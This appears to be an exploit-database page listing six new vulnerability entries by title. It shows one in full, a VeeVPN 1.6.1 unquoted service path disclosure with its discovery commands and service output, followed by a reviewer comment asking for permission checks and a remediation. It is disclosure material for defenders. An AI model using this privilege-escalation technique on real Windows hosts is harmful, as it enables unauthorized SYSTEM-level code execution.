
6 changes to exploits/shellcodes/ghdb

Gitea 1.24.0 - HTML Injection
Extensive VC Addons for WPBakery page builder 1.9.0 - Remote Code Execution (RCE)
Loaded Commerce 6.6 - Client-Side Template Injection(CSTI)
TranzAxis 3.2.41.10.26 - Stored Cross-Site Scripting (XSS) (Authenticated)
VeeVPN 1.6.1 - Unquoted Service Path
31 lines
No EOL
979 B
Text
# Exploit Title: VeeVPN 1.6.1 - 'VeePNService' Unquoted Service Path
# Date: 2024-12-27
# Exploit Author: Doğukan Orhan
# Vendor Homepage: https://veepn.com/
# Version: 1.6.1
# Tested on: Windows 10 Pro x64
# Step to discover Unquoted Service Path:
C:\Users\PC>wmic service where 'name like "%VeePNService%"' get name, displayname, pathname, startmode, startname
#Service Info
C:\Users\PC>sc qc VeePNService
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: VeePNService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\VeePN\service\VeePNService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : VeePNService
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
# Exploit:
This vulnerability could permit executing code during startup or reboot with the escalated privileges. |
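Review bot: The `# Exploit:` section at the end of the file gives only a generic impact sentence and never records the condition that decides whether this finding is real: who can write to the locations Windows tries before the full path. The `sc qc` output shows `BINARY_PATH_NAME : C:\Program Files (x86)\VeePN\service\VeePNService.exe` without quotes, running as `LocalSystem` with `AUTO_START`, and the only spaces in that path fall inside `Program Files (x86)`, so the candidate locations are all in the root of `C:` and the risk depends entirely on the permissions there. Please add the permission check that was done on the tested Windows 10 Pro x64 host, or state that the issue needs weakened directory permissions. The `wmic` command under `# Step to discover Unquoted Service Path:` is also listed without its output, unlike the `sc qc` query, so include it for consistency. A closing line with the remediation (wrapping the service's binary path in double quotes) would make the entry usable for defenders.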